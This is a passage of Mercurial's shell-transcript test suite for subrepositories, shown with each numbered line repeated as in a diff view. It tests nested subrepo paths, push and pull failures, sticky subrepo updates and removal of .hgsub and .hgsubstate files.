912 adding nested_relative/foo2 (glob)
913 $ hg -R nested_relative ci -mtest2
913 $ hg -R nested_relative ci -mtest2
914 $ hg init main
914 $ hg init main
915 $ echo "nested_relative = ../nested_relative" > main/.hgsub
915 $ echo "nested_relative = ../nested_relative" > main/.hgsub
916 $ echo "nested_absolute = `pwd`/nested_absolute" >> main/.hgsub
916 $ echo "nested_absolute = `pwd`/nested_absolute" >> main/.hgsub
917 $ hg -R main add
917 $ hg -R main add
918 adding main/.hgsub (glob)
918 adding main/.hgsub (glob)
919 $ hg -R main ci -m "add subrepos"
919 $ hg -R main ci -m "add subrepos"
920 $ cd ..
920 $ cd ..
921 $ hg clone mercurial/main mercurial2/main
921 $ hg clone mercurial/main mercurial2/main
922 updating to branch default
922 updating to branch default
923 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
923 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
924 $ cat mercurial2/main/nested_absolute/.hg/hgrc \
924 $ cat mercurial2/main/nested_absolute/.hg/hgrc \
925 > mercurial2/main/nested_relative/.hg/hgrc
925 > mercurial2/main/nested_relative/.hg/hgrc
926 [paths]
926 [paths]
927 default = $TESTTMP/mercurial/nested_absolute
927 default = $TESTTMP/mercurial/nested_absolute
928 [paths]
928 [paths]
929 default = $TESTTMP/mercurial/nested_relative
929 default = $TESTTMP/mercurial/nested_relative
930 $ rm -rf mercurial mercurial2
930 $ rm -rf mercurial mercurial2
931
931
932 Issue1977: multirepo push should fail if subrepo push fails
932 Issue1977: multirepo push should fail if subrepo push fails
933
933
934 $ hg init repo
934 $ hg init repo
935 $ hg init repo/s
935 $ hg init repo/s
936 $ echo a > repo/s/a
936 $ echo a > repo/s/a
937 $ hg -R repo/s ci -Am0
937 $ hg -R repo/s ci -Am0
938 adding a
938 adding a
939 $ echo s = s > repo/.hgsub
939 $ echo s = s > repo/.hgsub
940 $ hg -R repo ci -Am1
940 $ hg -R repo ci -Am1
941 adding .hgsub
941 adding .hgsub
942 $ hg clone repo repo2
942 $ hg clone repo repo2
943 updating to branch default
943 updating to branch default
944 cloning subrepo s from $TESTTMP/repo/s
944 cloning subrepo s from $TESTTMP/repo/s
945 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
945 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
946 $ hg -q -R repo2 pull -u
946 $ hg -q -R repo2 pull -u
947 $ echo 1 > repo2/s/a
947 $ echo 1 > repo2/s/a
948 $ hg -R repo2/s ci -m2
948 $ hg -R repo2/s ci -m2
949 $ hg -q -R repo2/s push
949 $ hg -q -R repo2/s push
950 $ hg -R repo2/s up -C 0
950 $ hg -R repo2/s up -C 0
951 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
951 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
952 $ echo 2 > repo2/s/b
952 $ echo 2 > repo2/s/b
953 $ hg -R repo2/s ci -m3 -A
953 $ hg -R repo2/s ci -m3 -A
954 adding b
954 adding b
955 created new head
955 created new head
956 $ hg -R repo2 ci -m3
956 $ hg -R repo2 ci -m3
957 $ hg -q -R repo2 push
957 $ hg -q -R repo2 push
958 abort: push creates new remote head cc505f09a8b2! (in subrepository "s")
958 abort: push creates new remote head cc505f09a8b2! (in subrepository "s")
959 (merge or see 'hg help push' for details about pushing new heads)
959 (merge or see 'hg help push' for details about pushing new heads)
960 [255]
960 [255]
961 $ hg -R repo update
961 $ hg -R repo update
962 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
962 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
963
963
964 test if untracked file is not overwritten
964 test if untracked file is not overwritten
965
965
966 (this also tests that updated .hgsubstate is treated as "modified",
966 (this also tests that updated .hgsubstate is treated as "modified",
967 when 'merge.update()' is aborted before 'merge.recordupdates()', even
967 when 'merge.update()' is aborted before 'merge.recordupdates()', even
968 if none of mode, size and timestamp of it isn't changed on the
968 if none of mode, size and timestamp of it isn't changed on the
969 filesystem (see also issue4583))
969 filesystem (see also issue4583))
970
970
971 $ echo issue3276_ok > repo/s/b
971 $ echo issue3276_ok > repo/s/b
972 $ hg -R repo2 push -f -q
972 $ hg -R repo2 push -f -q
973 $ touch -t 200001010000 repo/.hgsubstate
973 $ touch -t 200001010000 repo/.hgsubstate
974
974
975 $ cat >> repo/.hg/hgrc <<EOF
975 $ cat >> repo/.hg/hgrc <<EOF
976 > [fakedirstatewritetime]
976 > [fakedirstatewritetime]
977 > # emulate invoking dirstate.write() via repo.status()
977 > # emulate invoking dirstate.write() via repo.status()
978 > # at 2000-01-01 00:00
978 > # at 2000-01-01 00:00
979 > fakenow = 200001010000
979 > fakenow = 200001010000
980 >
980 >
981 > [extensions]
981 > [extensions]
982 > fakedirstatewritetime = $TESTDIR/fakedirstatewritetime.py
982 > fakedirstatewritetime = $TESTDIR/fakedirstatewritetime.py
983 > EOF
983 > EOF
984 $ hg -R repo update
984 $ hg -R repo update
985 b: untracked file differs
985 b: untracked file differs
986 abort: untracked files in working directory differ from files in requested revision (in subrepository "s")
986 abort: untracked files in working directory differ from files in requested revision (in subrepository "s")
987 [255]
987 [255]
988 $ cat >> repo/.hg/hgrc <<EOF
988 $ cat >> repo/.hg/hgrc <<EOF
989 > [extensions]
989 > [extensions]
990 > fakedirstatewritetime = !
990 > fakedirstatewritetime = !
991 > EOF
991 > EOF
992
992
993 $ cat repo/s/b
993 $ cat repo/s/b
994 issue3276_ok
994 issue3276_ok
995 $ rm repo/s/b
995 $ rm repo/s/b
996 $ touch -t 200001010000 repo/.hgsubstate
996 $ touch -t 200001010000 repo/.hgsubstate
997 $ hg -R repo revert --all
997 $ hg -R repo revert --all
998 reverting repo/.hgsubstate (glob)
998 reverting repo/.hgsubstate (glob)
999 reverting subrepo s
999 reverting subrepo s
1000 $ hg -R repo update
1000 $ hg -R repo update
1001 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1001 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1002 $ cat repo/s/b
1002 $ cat repo/s/b
1003 2
1003 2
1004 $ rm -rf repo2 repo
1004 $ rm -rf repo2 repo
1005
1005
1006
1006
1007 Issue1852 subrepos with relative paths always push/pull relative to default
1007 Issue1852 subrepos with relative paths always push/pull relative to default
1008
1008
1009 Prepare a repo with subrepo
1009 Prepare a repo with subrepo
1010
1010
1011 $ hg init issue1852a
1011 $ hg init issue1852a
1012 $ cd issue1852a
1012 $ cd issue1852a
1013 $ hg init sub/repo
1013 $ hg init sub/repo
1014 $ echo test > sub/repo/foo
1014 $ echo test > sub/repo/foo
1015 $ hg -R sub/repo add sub/repo/foo
1015 $ hg -R sub/repo add sub/repo/foo
1016 $ echo sub/repo = sub/repo > .hgsub
1016 $ echo sub/repo = sub/repo > .hgsub
1017 $ hg add .hgsub
1017 $ hg add .hgsub
1018 $ hg ci -mtest
1018 $ hg ci -mtest
1019 committing subrepository sub/repo (glob)
1019 committing subrepository sub/repo (glob)
1020 $ echo test >> sub/repo/foo
1020 $ echo test >> sub/repo/foo
1021 $ hg ci -mtest
1021 $ hg ci -mtest
1022 committing subrepository sub/repo (glob)
1022 committing subrepository sub/repo (glob)
1023 $ hg cat sub/repo/foo
1023 $ hg cat sub/repo/foo
1024 test
1024 test
1025 test
1025 test
1026 $ hg cat sub/repo/foo -Tjson | sed 's|\\\\|/|g'
1026 $ hg cat sub/repo/foo -Tjson | sed 's|\\\\|/|g'
1027 [
1027 [
1028 {
1028 {
1029 "abspath": "foo",
1029 "abspath": "foo",
1030 "data": "test\ntest\n",
1030 "data": "test\ntest\n",
1031 "path": "sub/repo/foo"
1031 "path": "sub/repo/foo"
1032 }
1032 }
1033 ]
1033 ]
1034 $ mkdir -p tmp/sub/repo
1034 $ mkdir -p tmp/sub/repo
1035 $ hg cat -r 0 --output tmp/%p_p sub/repo/foo
1035 $ hg cat -r 0 --output tmp/%p_p sub/repo/foo
1036 $ cat tmp/sub/repo/foo_p
1036 $ cat tmp/sub/repo/foo_p
1037 test
1037 test
1038 $ mv sub/repo sub_
1038 $ mv sub/repo sub_
1039 $ hg cat sub/repo/baz
1039 $ hg cat sub/repo/baz
1040 skipping missing subrepository: sub/repo
1040 skipping missing subrepository: sub/repo
1041 [1]
1041 [1]
1042 $ rm -rf sub/repo
1042 $ rm -rf sub/repo
1043 $ mv sub_ sub/repo
1043 $ mv sub_ sub/repo
1044 $ cd ..
1044 $ cd ..
1045
1045
1046 Create repo without default path, pull top repo, and see what happens on update
1046 Create repo without default path, pull top repo, and see what happens on update
1047
1047
1048 $ hg init issue1852b
1048 $ hg init issue1852b
1049 $ hg -R issue1852b pull issue1852a
1049 $ hg -R issue1852b pull issue1852a
1050 pulling from issue1852a
1050 pulling from issue1852a
1051 requesting all changes
1051 requesting all changes
1052 adding changesets
1052 adding changesets
1053 adding manifests
1053 adding manifests
1054 adding file changes
1054 adding file changes
1055 added 2 changesets with 3 changes to 2 files
1055 added 2 changesets with 3 changes to 2 files
1056 (run 'hg update' to get a working copy)
1056 (run 'hg update' to get a working copy)
1057 $ hg -R issue1852b update
1057 $ hg -R issue1852b update
1058 abort: default path for subrepository not found (in subrepository "sub/repo") (glob)
1058 abort: default path for subrepository not found (in subrepository "sub/repo") (glob)
1059 [255]
1059 [255]
1060
1060
1061 Ensure a full traceback, not just the SubrepoAbort part
1061 Ensure a full traceback, not just the SubrepoAbort part
1062
1062
1063 $ hg -R issue1852b update --traceback 2>&1 | grep 'raise error\.Abort'
1063 $ hg -R issue1852b update --traceback 2>&1 | grep 'raise error\.Abort'
1064 raise error.Abort(_("default path for subrepository not found"))
1064 raise error.Abort(_("default path for subrepository not found"))
1065
1065
1066 Pull -u now doesn't help
1066 Pull -u now doesn't help
1067
1067
1068 $ hg -R issue1852b pull -u issue1852a
1068 $ hg -R issue1852b pull -u issue1852a
1069 pulling from issue1852a
1069 pulling from issue1852a
1070 searching for changes
1070 searching for changes
1071 no changes found
1071 no changes found
1072
1072
1073 Try the same, but with pull -u
1073 Try the same, but with pull -u
1074
1074
1075 $ hg init issue1852c
1075 $ hg init issue1852c
1076 $ hg -R issue1852c pull -r0 -u issue1852a
1076 $ hg -R issue1852c pull -r0 -u issue1852a
1077 pulling from issue1852a
1077 pulling from issue1852a
1078 adding changesets
1078 adding changesets
1079 adding manifests
1079 adding manifests
1080 adding file changes
1080 adding file changes
1081 added 1 changesets with 2 changes to 2 files
1081 added 1 changesets with 2 changes to 2 files
1082 cloning subrepo sub/repo from issue1852a/sub/repo (glob)
1082 cloning subrepo sub/repo from issue1852a/sub/repo (glob)
1083 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1083 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1084
1084
1085 Try to push from the other side
1085 Try to push from the other side
1086
1086
1087 $ hg -R issue1852a push `pwd`/issue1852c
1087 $ hg -R issue1852a push `pwd`/issue1852c
1088 pushing to $TESTTMP/issue1852c (glob)
1088 pushing to $TESTTMP/issue1852c (glob)
1089 pushing subrepo sub/repo to $TESTTMP/issue1852c/sub/repo (glob)
1089 pushing subrepo sub/repo to $TESTTMP/issue1852c/sub/repo (glob)
1090 searching for changes
1090 searching for changes
1091 no changes found
1091 no changes found
1092 searching for changes
1092 searching for changes
1093 adding changesets
1093 adding changesets
1094 adding manifests
1094 adding manifests
1095 adding file changes
1095 adding file changes
1096 added 1 changesets with 1 changes to 1 files
1096 added 1 changesets with 1 changes to 1 files
1097
1097
1098 Incoming and outgoing should not use the default path:
1098 Incoming and outgoing should not use the default path:
1099
1099
1100 $ hg clone -q issue1852a issue1852d
1100 $ hg clone -q issue1852a issue1852d
1101 $ hg -R issue1852d outgoing --subrepos issue1852c
1101 $ hg -R issue1852d outgoing --subrepos issue1852c
1102 comparing with issue1852c
1102 comparing with issue1852c
1103 searching for changes
1103 searching for changes
1104 no changes found
1104 no changes found
1105 comparing with issue1852c/sub/repo
1105 comparing with issue1852c/sub/repo
1106 searching for changes
1106 searching for changes
1107 no changes found
1107 no changes found
1108 [1]
1108 [1]
1109 $ hg -R issue1852d incoming --subrepos issue1852c
1109 $ hg -R issue1852d incoming --subrepos issue1852c
1110 comparing with issue1852c
1110 comparing with issue1852c
1111 searching for changes
1111 searching for changes
1112 no changes found
1112 no changes found
1113 comparing with issue1852c/sub/repo
1113 comparing with issue1852c/sub/repo
1114 searching for changes
1114 searching for changes
1115 no changes found
1115 no changes found
1116 [1]
1116 [1]
1117
1117
1118 Check that merge of a new subrepo doesn't write the uncommitted state to
1118 Check that merge of a new subrepo doesn't write the uncommitted state to
1119 .hgsubstate (issue4622)
1119 .hgsubstate (issue4622)
1120
1120
1121 $ hg init issue1852a/addedsub
1121 $ hg init issue1852a/addedsub
1122 $ echo zzz > issue1852a/addedsub/zz.txt
1122 $ echo zzz > issue1852a/addedsub/zz.txt
1123 $ hg -R issue1852a/addedsub ci -Aqm "initial ZZ"
1123 $ hg -R issue1852a/addedsub ci -Aqm "initial ZZ"
1124
1124
1125 $ hg clone issue1852a/addedsub issue1852d/addedsub
1125 $ hg clone issue1852a/addedsub issue1852d/addedsub
1126 updating to branch default
1126 updating to branch default
1127 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1127 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1128
1128
1129 $ echo def > issue1852a/sub/repo/foo
1129 $ echo def > issue1852a/sub/repo/foo
1130 $ hg -R issue1852a ci -SAm 'tweaked subrepo'
1130 $ hg -R issue1852a ci -SAm 'tweaked subrepo'
1131 adding tmp/sub/repo/foo_p
1131 adding tmp/sub/repo/foo_p
1132 committing subrepository sub/repo (glob)
1132 committing subrepository sub/repo (glob)
1133
1133
1134 $ echo 'addedsub = addedsub' >> issue1852d/.hgsub
1134 $ echo 'addedsub = addedsub' >> issue1852d/.hgsub
1135 $ echo xyz > issue1852d/sub/repo/foo
1135 $ echo xyz > issue1852d/sub/repo/foo
1136 $ hg -R issue1852d pull -u
1136 $ hg -R issue1852d pull -u
1137 pulling from $TESTTMP/issue1852a (glob)
1137 pulling from $TESTTMP/issue1852a (glob)
1138 searching for changes
1138 searching for changes
1139 adding changesets
1139 adding changesets
1140 adding manifests
1140 adding manifests
1141 adding file changes
1141 adding file changes
1142 added 1 changesets with 2 changes to 2 files
1142 added 1 changesets with 2 changes to 2 files
1143 subrepository sub/repo diverged (local revision: f42d5c7504a8, remote revision: 46cd4aac504c)
1143 subrepository sub/repo diverged (local revision: f42d5c7504a8, remote revision: 46cd4aac504c)
1144 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1144 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1145 pulling subrepo sub/repo from $TESTTMP/issue1852a/sub/repo (glob)
1145 pulling subrepo sub/repo from $TESTTMP/issue1852a/sub/repo (glob)
1146 searching for changes
1146 searching for changes
1147 adding changesets
1147 adding changesets
1148 adding manifests
1148 adding manifests
1149 adding file changes
1149 adding file changes
1150 added 1 changesets with 1 changes to 1 files
1150 added 1 changesets with 1 changes to 1 files
1151 subrepository sources for sub/repo differ (glob)
1151 subrepository sources for sub/repo differ (glob)
1152 use (l)ocal source (f42d5c7504a8) or (r)emote source (46cd4aac504c)? l
1152 use (l)ocal source (f42d5c7504a8) or (r)emote source (46cd4aac504c)? l
1153 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1153 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1154 $ cat issue1852d/.hgsubstate
1154 $ cat issue1852d/.hgsubstate
1155 f42d5c7504a811dda50f5cf3e5e16c3330b87172 sub/repo
1155 f42d5c7504a811dda50f5cf3e5e16c3330b87172 sub/repo
1156
1156
1157 Check status of files when none of them belong to the first
1157 Check status of files when none of them belong to the first
1158 subrepository:
1158 subrepository:
1159
1159
1160 $ hg init subrepo-status
1160 $ hg init subrepo-status
1161 $ cd subrepo-status
1161 $ cd subrepo-status
1162 $ hg init subrepo-1
1162 $ hg init subrepo-1
1163 $ hg init subrepo-2
1163 $ hg init subrepo-2
1164 $ cd subrepo-2
1164 $ cd subrepo-2
1165 $ touch file
1165 $ touch file
1166 $ hg add file
1166 $ hg add file
1167 $ cd ..
1167 $ cd ..
1168 $ echo subrepo-1 = subrepo-1 > .hgsub
1168 $ echo subrepo-1 = subrepo-1 > .hgsub
1169 $ echo subrepo-2 = subrepo-2 >> .hgsub
1169 $ echo subrepo-2 = subrepo-2 >> .hgsub
1170 $ hg add .hgsub
1170 $ hg add .hgsub
1171 $ hg ci -m 'Added subrepos'
1171 $ hg ci -m 'Added subrepos'
1172 committing subrepository subrepo-2
1172 committing subrepository subrepo-2
1173 $ hg st subrepo-2/file
1173 $ hg st subrepo-2/file
1174
1174
1175 Check that share works with subrepo
1175 Check that share works with subrepo
1176 $ hg --config extensions.share= share . ../shared
1176 $ hg --config extensions.share= share . ../shared
1177 updating working directory
1177 updating working directory
1178 cloning subrepo subrepo-2 from $TESTTMP/subrepo-status/subrepo-2
1178 cloning subrepo subrepo-2 from $TESTTMP/subrepo-status/subrepo-2
1179 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1179 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1180 $ test -f ../shared/subrepo-1/.hg/sharedpath
1180 $ test -f ../shared/subrepo-1/.hg/sharedpath
1181 [1]
1181 [1]
1182 $ hg -R ../shared in
1182 $ hg -R ../shared in
1183 abort: repository default not found!
1183 abort: repository default not found!
1184 [255]
1184 [255]
1185 $ hg -R ../shared/subrepo-2 showconfig paths
1185 $ hg -R ../shared/subrepo-2 showconfig paths
1186 paths.default=$TESTTMP/subrepo-status/subrepo-2
1186 paths.default=$TESTTMP/subrepo-status/subrepo-2
1187 $ hg -R ../shared/subrepo-1 sum --remote
1187 $ hg -R ../shared/subrepo-1 sum --remote
1188 parent: -1:000000000000 tip (empty repository)
1188 parent: -1:000000000000 tip (empty repository)
1189 branch: default
1189 branch: default
1190 commit: (clean)
1190 commit: (clean)
1191 update: (current)
1191 update: (current)
1192 remote: (synced)
1192 remote: (synced)
1193
1193
1194 Check hg update --clean
1194 Check hg update --clean
1195 $ cd $TESTTMP/t
1195 $ cd $TESTTMP/t
1196 $ rm -r t/t.orig
1196 $ rm -r t/t.orig
1197 $ hg status -S --all
1197 $ hg status -S --all
1198 C .hgsub
1198 C .hgsub
1199 C .hgsubstate
1199 C .hgsubstate
1200 C a
1200 C a
1201 C s/.hgsub
1201 C s/.hgsub
1202 C s/.hgsubstate
1202 C s/.hgsubstate
1203 C s/a
1203 C s/a
1204 C s/ss/a
1204 C s/ss/a
1205 C t/t
1205 C t/t
1206 $ echo c1 > s/a
1206 $ echo c1 > s/a
1207 $ cd s
1207 $ cd s
1208 $ echo c1 > b
1208 $ echo c1 > b
1209 $ echo c1 > c
1209 $ echo c1 > c
1210 $ hg add b
1210 $ hg add b
1211 $ cd ..
1211 $ cd ..
1212 $ hg status -S
1212 $ hg status -S
1213 M s/a
1213 M s/a
1214 A s/b
1214 A s/b
1215 ? s/c
1215 ? s/c
1216 $ hg update -C
1216 $ hg update -C
1217 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1217 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1218 updated to "925c17564ef8: 13"
1218 updated to "925c17564ef8: 13"
1219 2 other heads for branch "default"
1219 2 other heads for branch "default"
1220 $ hg status -S
1220 $ hg status -S
1221 ? s/b
1221 ? s/b
1222 ? s/c
1222 ? s/c
1223
1223
1224 Sticky subrepositories, no changes
1224 Sticky subrepositories, no changes
1225 $ cd $TESTTMP/t
1225 $ cd $TESTTMP/t
1226 $ hg id
1226 $ hg id
1227 925c17564ef8 tip
1227 925c17564ef8 tip
1228 $ hg -R s id
1228 $ hg -R s id
1229 12a213df6fa9 tip
1229 12a213df6fa9 tip
1230 $ hg -R t id
1230 $ hg -R t id
1231 52c0adc0515a tip
1231 52c0adc0515a tip
1232 $ hg update 11
1232 $ hg update 11
1233 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1233 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1234 $ hg id
1234 $ hg id
1235 365661e5936a
1235 365661e5936a
1236 $ hg -R s id
1236 $ hg -R s id
1237 fc627a69481f
1237 fc627a69481f
1238 $ hg -R t id
1238 $ hg -R t id
1239 e95bcfa18a35
1239 e95bcfa18a35
1240
1240
1241 Sticky subrepositories, file changes
1241 Sticky subrepositories, file changes
1242 $ touch s/f1
1242 $ touch s/f1
1243 $ touch t/f1
1243 $ touch t/f1
1244 $ hg add -S s/f1
1244 $ hg add -S s/f1
1245 $ hg add -S t/f1
1245 $ hg add -S t/f1
1246 $ hg id
1246 $ hg id
1247 365661e5936a+
1247 365661e5936a+
1248 $ hg -R s id
1248 $ hg -R s id
1249 fc627a69481f+
1249 fc627a69481f+
1250 $ hg -R t id
1250 $ hg -R t id
1251 e95bcfa18a35+
1251 e95bcfa18a35+
1252 $ hg update tip
1252 $ hg update tip
1253 subrepository s diverged (local revision: fc627a69481f, remote revision: 12a213df6fa9)
1253 subrepository s diverged (local revision: fc627a69481f, remote revision: 12a213df6fa9)
1254 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1254 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1255 subrepository sources for s differ
1255 subrepository sources for s differ
1256 use (l)ocal source (fc627a69481f) or (r)emote source (12a213df6fa9)? l
1256 use (l)ocal source (fc627a69481f) or (r)emote source (12a213df6fa9)? l
1257 subrepository t diverged (local revision: e95bcfa18a35, remote revision: 52c0adc0515a)
1257 subrepository t diverged (local revision: e95bcfa18a35, remote revision: 52c0adc0515a)
1258 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1258 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1259 subrepository sources for t differ
1259 subrepository sources for t differ
1260 use (l)ocal source (e95bcfa18a35) or (r)emote source (52c0adc0515a)? l
1260 use (l)ocal source (e95bcfa18a35) or (r)emote source (52c0adc0515a)? l
1261 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1261 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1262 $ hg id
1262 $ hg id
1263 925c17564ef8+ tip
1263 925c17564ef8+ tip
1264 $ hg -R s id
1264 $ hg -R s id
1265 fc627a69481f+
1265 fc627a69481f+
1266 $ hg -R t id
1266 $ hg -R t id
1267 e95bcfa18a35+
1267 e95bcfa18a35+
1268 $ hg update --clean tip
1268 $ hg update --clean tip
1269 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1269 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1270
1270
1271 Sticky subrepository, revision updates
1271 Sticky subrepository, revision updates
1272 $ hg id
1272 $ hg id
1273 925c17564ef8 tip
1273 925c17564ef8 tip
1274 $ hg -R s id
1274 $ hg -R s id
1275 12a213df6fa9 tip
1275 12a213df6fa9 tip
1276 $ hg -R t id
1276 $ hg -R t id
1277 52c0adc0515a tip
1277 52c0adc0515a tip
1278 $ cd s
1278 $ cd s
1279 $ hg update -r -2
1279 $ hg update -r -2
1280 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1280 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1281 $ cd ../t
1281 $ cd ../t
1282 $ hg update -r 2
1282 $ hg update -r 2
1283 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1283 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1284 $ cd ..
1284 $ cd ..
1285 $ hg update 10
1285 $ hg update 10
1286 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1286 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1287 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1287 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1288 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 20a0db6fbf6c)
1288 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 20a0db6fbf6c)
1289 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1289 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1290 subrepository sources for t differ (in checked out version)
1290 subrepository sources for t differ (in checked out version)
1291 use (l)ocal source (7af322bc1198) or (r)emote source (20a0db6fbf6c)? l
1291 use (l)ocal source (7af322bc1198) or (r)emote source (20a0db6fbf6c)? l
1292 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1292 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1293 $ hg id
1293 $ hg id
1294 e45c8b14af55+
1294 e45c8b14af55+
1295 $ hg -R s id
1295 $ hg -R s id
1296 02dcf1d70411
1296 02dcf1d70411
1297 $ hg -R t id
1297 $ hg -R t id
1298 7af322bc1198
1298 7af322bc1198
1299
1299
1300 Sticky subrepository, file changes and revision updates
1300 Sticky subrepository, file changes and revision updates
1301 $ touch s/f1
1301 $ touch s/f1
1302 $ touch t/f1
1302 $ touch t/f1
1303 $ hg add -S s/f1
1303 $ hg add -S s/f1
1304 $ hg add -S t/f1
1304 $ hg add -S t/f1
1305 $ hg id
1305 $ hg id
1306 e45c8b14af55+
1306 e45c8b14af55+
1307 $ hg -R s id
1307 $ hg -R s id
1308 02dcf1d70411+
1308 02dcf1d70411+
1309 $ hg -R t id
1309 $ hg -R t id
1310 7af322bc1198+
1310 7af322bc1198+
1311 $ hg update tip
1311 $ hg update tip
1312 subrepository s diverged (local revision: 12a213df6fa9, remote revision: 12a213df6fa9)
1312 subrepository s diverged (local revision: 12a213df6fa9, remote revision: 12a213df6fa9)
1313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1314 subrepository sources for s differ
1314 subrepository sources for s differ
1315 use (l)ocal source (02dcf1d70411) or (r)emote source (12a213df6fa9)? l
1315 use (l)ocal source (02dcf1d70411) or (r)emote source (12a213df6fa9)? l
1316 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 52c0adc0515a)
1316 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 52c0adc0515a)
1317 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1317 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1318 subrepository sources for t differ
1318 subrepository sources for t differ
1319 use (l)ocal source (7af322bc1198) or (r)emote source (52c0adc0515a)? l
1319 use (l)ocal source (7af322bc1198) or (r)emote source (52c0adc0515a)? l
1320 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1320 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1321 $ hg id
1321 $ hg id
1322 925c17564ef8+ tip
1322 925c17564ef8+ tip
1323 $ hg -R s id
1323 $ hg -R s id
1324 02dcf1d70411+
1324 02dcf1d70411+
1325 $ hg -R t id
1325 $ hg -R t id
1326 7af322bc1198+
1326 7af322bc1198+
1327
1327
1328 Sticky repository, update --clean
1328 Sticky repository, update --clean
1329 $ hg update --clean tip
1329 $ hg update --clean tip
1330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1331 $ hg id
1331 $ hg id
1332 925c17564ef8 tip
1332 925c17564ef8 tip
1333 $ hg -R s id
1333 $ hg -R s id
1334 12a213df6fa9 tip
1334 12a213df6fa9 tip
1335 $ hg -R t id
1335 $ hg -R t id
1336 52c0adc0515a tip
1336 52c0adc0515a tip
1337
1337
1338 Test subrepo already at intended revision:
1338 Test subrepo already at intended revision:
1339 $ cd s
1339 $ cd s
1340 $ hg update fc627a69481f
1340 $ hg update fc627a69481f
1341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1342 $ cd ..
1342 $ cd ..
1343 $ hg update 11
1343 $ hg update 11
1344 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1344 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1345 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1345 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1346 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1346 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1347 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1347 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1348 $ hg id -n
1348 $ hg id -n
1349 11+
1349 11+
1350 $ hg -R s id
1350 $ hg -R s id
1351 fc627a69481f
1351 fc627a69481f
1352 $ hg -R t id
1352 $ hg -R t id
1353 e95bcfa18a35
1353 e95bcfa18a35
1354
1354
1355 Test that removing .hgsubstate doesn't break anything:
1355 Test that removing .hgsubstate doesn't break anything:
1356
1356
1357 $ hg rm -f .hgsubstate
1357 $ hg rm -f .hgsubstate
1358 $ hg ci -mrm
1358 $ hg ci -mrm
1359 nothing changed
1359 nothing changed
1360 [1]
1360 [1]
1361 $ hg log -vr tip
1361 $ hg log -vr tip
1362 changeset: 13:925c17564ef8
1362 changeset: 13:925c17564ef8
1363 tag: tip
1363 tag: tip
1364 user: test
1364 user: test
1365 date: Thu Jan 01 00:00:00 1970 +0000
1365 date: Thu Jan 01 00:00:00 1970 +0000
1366 files: .hgsubstate
1366 files: .hgsubstate
1367 description:
1367 description:
1368 13
1368 13
1369
1369
1370
1370
1371
1371
1372 Test that removing .hgsub removes .hgsubstate:
1372 Test that removing .hgsub removes .hgsubstate:
1373
1373
1374 $ hg rm .hgsub
1374 $ hg rm .hgsub
1375 $ hg ci -mrm2
1375 $ hg ci -mrm2
1376 created new head
1376 created new head
1377 $ hg log -vr tip
1377 $ hg log -vr tip
1378 changeset: 14:2400bccd50af
1378 changeset: 14:2400bccd50af
1379 tag: tip
1379 tag: tip
